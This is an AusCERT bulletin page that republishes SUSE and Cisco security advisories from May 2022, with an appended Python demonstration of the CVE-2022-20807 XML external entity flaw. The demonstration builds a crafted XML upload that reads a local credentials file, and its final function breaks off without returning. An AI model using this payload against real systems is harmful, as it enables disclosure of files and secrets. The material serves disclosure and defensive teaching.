AusCERT - Security Bulletins

Latest published security bulletins. See https://www.auscert.org.au/rss/ for feed information.
20 May 2022

ESB-2022.2455 - [SUSE] ucode-intel: CVSS (Max): 5.3

===========================================================================
AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2455
                      Security update for ucode-intel
                                20 May 2022
===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           ucode-intel
Publisher:         SUSE
Operating System:  SUSE
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-21151

Original Bulletin:
   https://www.suse.com/support/update/announcement/2022/suse-su-20221732-1

Comment: CVSS (Max):  5.3 CVE-2022-21151 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N)
         CVSS Source: SUSE
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for ucode-intel
______________________________________________________________________________

Announcement ID:   SUSE-SU-2022:1732-1
Rating:            moderate
References:        #1198717 #1199423
Cross-References:  CVE-2022-21151
Affected Products:
                   SUSE Linux Enterprise High Performance Computing 15-ESPOS
                   SUSE Linux Enterprise High Performance Computing 15-LTSS
                   SUSE Linux Enterprise Server for SAP 15
______________________________________________________________________________

An update that solves one vulnerability and has one errata is now available.

Description:

This update for ucode-intel fixes the following issues:

Updated to Intel CPU Microcode 20220510 release. (bsc#1199423)
Updated to Intel CPU Microcode 20220419 release. (bsc#1198717)

o CVE-2022-21151: Processor optimization removal or modification of
  security-critical code for some Intel(R) Processors may allow an
  authenticated user to potentially enable information disclosure via local
  access (bsc#1199423).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
  zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-1732=1

o SUSE Linux Enterprise High Performance Computing 15-LTSS:
  zypper in -t patch SUSE-SLE-Product-HPC-15-2022-1732=1

o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
  zypper in -t patch SUSE-SLE-Product-HPC-15-2022-1732=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (x86_64):
  ucode-intel-20220510-150000.3.74.1

o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
  ucode-intel-20220510-150000.3.74.1

o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
  ucode-intel-20220510-150000.3.74.1

References:

o https://www.suse.com/security/cve/CVE-2022-21151.html
o https://bugzilla.suse.com/1198717
o https://bugzilla.suse.com/1199423

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights

This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
20 May 2022

ESB-2022.2454 - [SUSE] curl: CVSS (Max): 7.5

===========================================================================
AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2454
                         Security update for curl
                                20 May 2022
===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           curl
Publisher:         SUSE
Operating System:  SUSE
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-27782 CVE-2022-27781

Original Bulletin:
   https://www.suse.com/support/update/announcement/2022/suse-su-20221733-1

Comment: CVSS (Max):  7.5 CVE-2022-27782 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
         CVSS Source: SUSE
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for curl
______________________________________________________________________________

Announcement ID:   SUSE-SU-2022:1733-1
Rating:            important
References:        #1199223 #1199224
Cross-References:  CVE-2022-27781 CVE-2022-27782
Affected Products:
                   HPE Helion Openstack 8
                   SUSE Linux Enterprise Server 12-SP2-BCL
                   SUSE Linux Enterprise Server 12-SP3-BCL
                   SUSE Linux Enterprise Server 12-SP3-LTSS
                   SUSE Linux Enterprise Server for SAP 12-SP3
                   SUSE OpenStack Cloud 8
                   SUSE OpenStack Cloud Crowbar 8
______________________________________________________________________________

An update that fixes two vulnerabilities is now available.

Description:

This update for curl fixes the following issues:

o CVE-2022-27781: Fixed CERTINFO never-ending busy-loop (bsc#1199223)
o CVE-2022-27782: Fixed TLS and SSH connection too eager reuse (bsc#1199224)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

o SUSE OpenStack Cloud Crowbar 8:
  zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2022-1733=1

o SUSE OpenStack Cloud 8:
  zypper in -t patch SUSE-OpenStack-Cloud-8-2022-1733=1

o SUSE Linux Enterprise Server for SAP 12-SP3:
  zypper in -t patch SUSE-SLE-SAP-12-SP3-2022-1733=1

o SUSE Linux Enterprise Server 12-SP3-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP3-2022-1733=1

o SUSE Linux Enterprise Server 12-SP3-BCL:
  zypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2022-1733=1

o SUSE Linux Enterprise Server 12-SP2-BCL:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2022-1733=1

o HPE Helion Openstack 8:
  zypper in -t patch HPE-Helion-OpenStack-8-2022-1733=1

Package List:

o SUSE OpenStack Cloud Crowbar 8 (x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o SUSE OpenStack Cloud 8 (x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o SUSE Linux Enterprise Server for SAP 12-SP3 (x86_64):
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1

o SUSE Linux Enterprise Server 12-SP3-LTSS (aarch64 ppc64le s390x x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o SUSE Linux Enterprise Server 12-SP3-LTSS (s390x x86_64):
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1

o SUSE Linux Enterprise Server 12-SP3-BCL (x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

o HPE Helion Openstack 8 (x86_64):
  curl-7.37.0-37.76.1
  curl-debuginfo-7.37.0-37.76.1
  curl-debugsource-7.37.0-37.76.1
  libcurl4-32bit-7.37.0-37.76.1
  libcurl4-7.37.0-37.76.1
  libcurl4-debuginfo-32bit-7.37.0-37.76.1
  libcurl4-debuginfo-7.37.0-37.76.1

References:

o https://www.suse.com/security/cve/CVE-2022-27781.html
o https://www.suse.com/security/cve/CVE-2022-27782.html
o https://bugzilla.suse.com/1199223
o https://bugzilla.suse.com/1199224

--------------------------END INCLUDED TEXT--------------------
19 May 2022

ESB-2022.2453 - [Cisco] Cisco UCS Director: CVSS (Max): 4.8

===========================================================================
AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2453
        Cisco UCS Director JavaScript Cross-Site Scripting Vulnerability
                                19 May 2022
===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           Cisco UCS Director
Publisher:         Cisco Systems
Operating System:  Cisco
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-20765

Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7

Comment: CVSS (Max):  4.8 CVE-2022-20765 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)
         CVSS Source: Cisco Systems
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

--------------------------BEGIN INCLUDED TEXT--------------------

Cisco UCS Director JavaScript Cross-Site Scripting Vulnerability

Priority:        Medium
Advisory ID:     cisco-sa-UCS-XSS-uQSME3L7
First Published: 2022 May 18 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvg92051
CVE Names:       CVE-2022-20765
CWEs:            CWE-80

Summary

  o A vulnerability in the web applications of Cisco UCS Director could allow
    an authenticated, remote attacker to conduct a cross-site scripting attack
    on an affected system.

    This vulnerability is due to unsanitized user input. An attacker could
    exploit this vulnerability by submitting custom JavaScript to affected web
    applications. A successful exploit could allow the attacker to rewrite web
    page content, access sensitive information stored in the applications, and
    alter data by submitting forms.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco UCS Director.

    For information about which Cisco software releases were vulnerable at the
    time of publication, see the Fixed Software section of this advisory. See
    the Details section in the bug ID(s) at the top of this advisory for the
    most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Indicators of Compromise

  o The Cisco Security Indicators of Compromise Reference Guide lists commonly
    observed IoCs, which can help identify devices that may have been impacted
    by the vulnerability disclosed in this Cisco security advisory.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the
    Cisco Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    Fixed Releases

    At the time of publication, the release information in the following
    table(s) was accurate. See the Details section in the bug ID(s) at the top
    of this advisory for the most complete and current information.

    +----------------------------+-----------------------------+
    | Cisco UCS Director Release | First Fixed Release         |
    +----------------------------+-----------------------------+
    | Earlier than 6             | Migrate to a fixed release. |
    +----------------------------+-----------------------------+
    | 6                          | 6.6                         |
    +----------------------------+-----------------------------+

    The Cisco Product Security Incident Response Team (PSIRT) validates only
    the affected and fixed release information that is documented in this
    advisory.

Exploitation and Public Announcements

  o The Cisco PSIRT is not aware of any public announcements or malicious use
    of the vulnerability that is described in this advisory.

Source

  o This vulnerability was found during the resolution of a Cisco TAC support
    case.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

Related to This Advisory

  o Cross-Site Scripting

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2022-MAY-18  |
    +----------+---------------------------+----------+--------+--------------+

--------------------------END INCLUDED TEXT--------------------
19 May 2022

ESB-2022.2452 - [Cisco] Cisco Secure Network Analytics: CVSS (Max): 5.5

===========================================================================
AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2452
       Cisco Secure Network Analytics Remote Code Execution Vulnerability
                                19 May 2022
===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           Cisco Secure Network Analytics
Publisher:         Cisco Systems
Operating System:  Cisco
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-20797

Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK

Comment: CVSS (Max):  5.5 CVE-2022-20797 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L)
         CVSS Source: Cisco Systems
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L

--------------------------BEGIN INCLUDED TEXT--------------------

Cisco Secure Network Analytics Remote Code Execution Vulnerability

Priority:        Medium
Advisory ID:     cisco-sa-stealth-rce-2hYb9KFK
First Published: 2022 May 18 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvz12708
CVE Names:       CVE-2022-20797
CWEs:            CWE-20

Summary

  o A vulnerability in the web-based management interface of Cisco Secure
    Network Analytics, formerly Cisco Stealthwatch Enterprise, could allow an
    authenticated, remote attacker to execute arbitrary commands as an
    administrator on the underlying operating system.

    This vulnerability is due to insufficient user input validation by the
    web-based management interface of the affected software. An attacker could
    exploit this vulnerability by injecting arbitrary commands in the web-based
    management interface. A successful exploit could allow the attacker to make
    configuration changes on the affected device or cause certain services to
    restart unexpectedly.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK

    Attention: Simplifying the Cisco portfolio includes the renaming of
    security products under one brand: Cisco Secure. For more information, see
    Meet Cisco Secure.

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco Secure
    Network Analytics.

    For information about which Cisco software releases were vulnerable at the
    time of publication, see the Fixed Software section of this advisory. See
    the Details section in the bug ID(s) at the top of this advisory for the
    most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the
    Cisco Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    At the time of publication, the release information in the following
    table(s) was accurate. See the Details section in the bug ID(s) at the top
    of this advisory for the most complete and current information.

    The left column lists Cisco software releases, and the right column
    indicates whether a release was affected by the vulnerability described in
    this advisory and which release included the fix for this vulnerability.

    +--------------------------------+---------------------+
    | Cisco Secure Network Analytics | First Fixed Release |
    +--------------------------------+---------------------+
    | Earlier than 7.4.1             | 7.4.1               |
    +--------------------------------+---------------------+

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2022-APR-20  |
    +----------+---------------------------+----------+--------+--------------+

--------------------------END INCLUDED TEXT--------------------
19 May 2022

ESB-2022.2451 - [Cisco] Cisco Expressway Series and Cisco TelePresence Video Communication Server: CVSS (Max): 5.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2022.2451
      Cisco Expressway Series and Cisco TelePresence Video Communication
                          Server Vulnerabilities
                                 19 May 2022

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Expressway Series and Cisco TelePresence Video
                   Communication Server
Publisher:         Cisco Systems
Operating System:  Cisco
Resolution:        Patch/Upgrade
CVE Names:         CVE-2022-20809 CVE-2022-20807 CVE-2022-20806
Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV

Comment: CVSS (Max):  5.5 CVE-2022-20806 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L)
         CVSS Source: Cisco Systems
         Calculator:  https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Expressway Series and Cisco TelePresence Video Communication Server
Vulnerabilities

Priority:        Medium
Advisory ID:     cisco-sa-expressway-filewrite-bsFVwueV
First Published: 2022 May 18 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvz71486 CSCwa25061 CSCwa25106
CVE Names:       CVE-2022-20806 CVE-2022-20807 CVE-2022-20809
CWEs:            CWE-532 CWE-611 CWE-73

Summary

  o Multiple vulnerabilities in the API and web-based management interfaces of
    Cisco Expressway Series and Cisco TelePresence Video Communication Server
    (VCS) could allow an authenticated, remote attacker to write files or
    disclose sensitive information on an affected device.

    For more information about these vulnerabilities, see the Details section
    of this advisory.

    Cisco has released software updates that address these vulnerabilities.
    There are no workarounds that address these vulnerabilities.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV

Affected Products

  o Vulnerable Products

    At the time of publication, these vulnerabilities affected Cisco Expressway
    Series and Cisco TelePresence VCS.

    Note: The default configuration is vulnerable for CVE-2022-20806 and
    CVE-2022-20807. CVE-2022-20809 only affects Cisco products that have debug
    logging enabled.

    For information about which Cisco software releases were vulnerable at the
    time of publication, see the Fixed Software section of this advisory. See
    the Details section in the bug ID(s) at the top of this advisory for the
    most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by these vulnerabilities.

Details

  o The vulnerabilities are not dependent on one another. Exploitation of one
    of the vulnerabilities is not required to exploit another vulnerability. In
    addition, a software release that is affected by one of the vulnerabilities
    may not be affected by the other vulnerabilities.

    Details about the vulnerabilities are as follows:

    CVE-2022-20806: Cisco Expressway Series and Cisco TelePresence VCS Arbitrary
    File Write Vulnerability

    A vulnerability in the cluster database API of Cisco Expressway Series and
    Cisco TelePresence Video Communication Server (VCS) could allow an
    authenticated, remote attacker with read / write privileges on the
    application to obtain sensitive information and cause a partial denial of
    service (DoS) condition on an affected device.

    This vulnerability is due to insufficient input validation of user-supplied
    command arguments. An attacker could exploit this vulnerability by
    authenticating to the device with read / write privileges and issuing a
    crafted command. A successful exploit could allow the attacker to read
    arbitrary files on the underlying operating system at a rate that impacts
    system performance.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    Bug ID(s): CSCvz71486
    CVE ID: CVE-2022-20806
    Security Impact Rating (SIR): Medium
    CVSS Base Score: 5.5
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L

    CVE-2022-20807: Cisco Expressway Series and Cisco TelePresence VCS XML
    External Entity Injection Vulnerability

    A vulnerability in the file-parsing logic of Cisco Expressway Series and
    Cisco TelePresence Video Communication Server (VCS) could allow an
    authenticated, remote attacker with read / write privileges to obtain
    sensitive information on an affected device.

    This vulnerability is due to improper handling of XML External Entity (XXE)
    entries when parsing certain XML files. An attacker could exploit this
    vulnerability by uploading a crafted XML file that contains references to
    external entities. A successful exploit could allow the attacker to
    retrieve files from the local system, resulting in the disclosure of
    sensitive information on an affected system.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    Bug ID(s): CSCwa25061
    CVE ID: CVE-2022-20807
    Security Impact Rating (SIR): Medium
    CVSS Base Score: 4.9
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

    CVE-2022-20809: Cisco Expressway Series and Cisco TelePresence VCS Arbitrary
    File Write Vulnerability

    A vulnerability in the logging component of Cisco Expressway Series and
    Cisco TelePresence Video Communication Server (VCS) could allow an
    authenticated, remote attacker to view sensitive information in clear text
    on an affected system.

    This vulnerability is due to the storage of unencrypted credentials in
    certain logs. An attacker could exploit this vulnerability by accessing the
    logs on an affected system. A successful exploit could allow the attacker
    to view the credentials of other users of the shared device. This
    vulnerability only occurs when debug logging is enabled on the device.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    Bug ID(s): CSCwa25106
    CVE ID: CVE-2022-20809
    Security Impact Rating (SIR): Medium
    CVSS Base Score: 4.3
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Workarounds

  o There are no workarounds that address these vulnerabilities.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance providers.

    Fixed Releases

    At the time of publication, the release information in the following
    table(s) was accurate. See the Details section in the bug ID(s) at the top
    of this advisory for the most complete and current information.

    The left column lists Cisco software releases, and the right column
    indicates whether a release was affected by the vulnerabilities that are
    described in this advisory and which release included the fix for these
    vulnerabilities.

    Cisco Expressway Series and Cisco TelePresence VCS Release   First Fixed Release
    Earlier than 14.0                                            Migrate to a fixed release.
    14.0                                                         14.0.7

    The Cisco Product Security Incident Response Team (PSIRT) validates only
    the affected and fixed release information that is documented in this
    advisory.

Exploitation and Public Announcements

  o The Cisco PSIRT is not aware of any public announcements or malicious use
    of the vulnerabilities that are described in this advisory.

Source

  o These vulnerabilities were found during internal security testing by Jason
    Crowder of the Cisco Advanced Security Initiatives Group (ASIG).

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2022-MAY-18  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is maintained
within your organisation, so if you do not wish to continue receiving these
bulletins you should contact your local IT manager. If you do not know who that
is, please send an email to auscert@auscert.org.au and we will forward your
request to the appropriate person.

NOTE: Third Party Rights

This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content.
The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. 
=========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMeMkNZI30y1K9AQiZhBAAnACf99pbG66P3eSs0ZaWCLOj/PfBSJbn vHn0UgZoz4IpaL5cve6wLWzhuF6UAVl8szW2e38xafBPtvlLE9zWGJMto8hczeMq 2l0+U9HStZ28Y/SVZDKvYELHaRlBYFbN11HyNFtKhPPOP+OOVsCm6udda3uVVXK3 RXhUI3cN0VgKhILt+m184nKsWtdvQxjWYLYUlxmj/ejkCivRRr7HghuVdH9sEkza EXeyVPCjE7hHbvN13VwmHtbG+PLwA9Ctrn1NsrwOpbhsHNsS7zXNsO17IeDZ4mjt Yd8JL/c58w9r7rDAJpMVVwQDahZrhbGD38BJfxsKb5CDD/8w1gnWjGm9gKm8fFhb oYksrW1ynjADwUwt25a3COu/5Dyg111y30IopUvPhqvqcPLDlQKCFVfOGnFrkWfP nERl61LA3Oq7h2HOtDpW3i2KIKpWxNCAOdl8JCS7619m3nSdasl/yuwhXHmGPw+Z OFHJgTbuZ8BYT3j9DxWReyDdGxqvtWBJBqoIzpNeY/rFrYuxNQQEeEzSIg2E0nD1 NsRworucOhwD9p/3IVGikqPuGNVX6gBL1vtLbf3gRzhMdyoEeMo5pW3dZLSkGxVc fwEyYU+68Ddj9eXUtu68MSuaGsNr0FX7JS2O4A42guFhLiY+Zd0IaOZVFRHexJaX Ko/7mQ5FAas= =ClG+ -----END PGP SIGNATURE-----
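CVE-2022-20807 above is a classic XXE: an uploaded XML file declares an external entity, and the parser fetches the referenced local file and inlines it into the parsed content. Nothing is known here about the Expressway parser itself, so what follows is an added example written for this page, not Cisco code. It reproduces the failure mode with Python's standard-library xml.sax (expat) reader: a constructed secrets file, a crafted upload whose DOCTYPE points an entity at that file, and one parse with external general entities resolved (the vulnerable configuration) beside one with them left off (expatreader's default, and the hardened setting). The file name, element names and secret value are all assumptions for the demonstration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers the character data the parser emits inside the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_upload(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse an uploaded XML document and return its text content.

    resolve_external_entities=True is the XXE-prone configuration: every
    <!ENTITY name SYSTEM "..."> in the DOCTYPE is opened and its content is
    inlined where the entity is referenced, so a crafted upload can pull
    local files into the parsed output. False (the expatreader default)
    leaves external general entities unresolved.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks).strip()


def crafted_upload(target_path: str) -> bytes:
    """Build the attacker's upload: a DOCTYPE declaring an external entity
    that names a local file, referenced from an element the application
    reads back. Element names are assumed for the demo."""
    doc = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE config [<!ENTITY xxe SYSTEM "{target_path}">]>\n'
        "<config><name>&xxe;</name></config>"
    )
    return doc.encode("utf-8")


def xxe_demo() -> tuple:
    """Run the crafted upload through both parser configurations.

    Returns (text seen by the vulnerable parser, text seen by the hardened
    parser). The secret file is constructed here purely for the demo.
    """
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "credentials.txt")
        with open(secret_path, "w", encoding="utf-8") as fh:
            fh.write("admin:hunter2")  # constructed sample secret
        upload = crafted_upload(secret_path)
        leaked = parse_upload(upload, resolve_external_entities=True)
        blocked = parse_upload(upload, resolve_external_entities=False)
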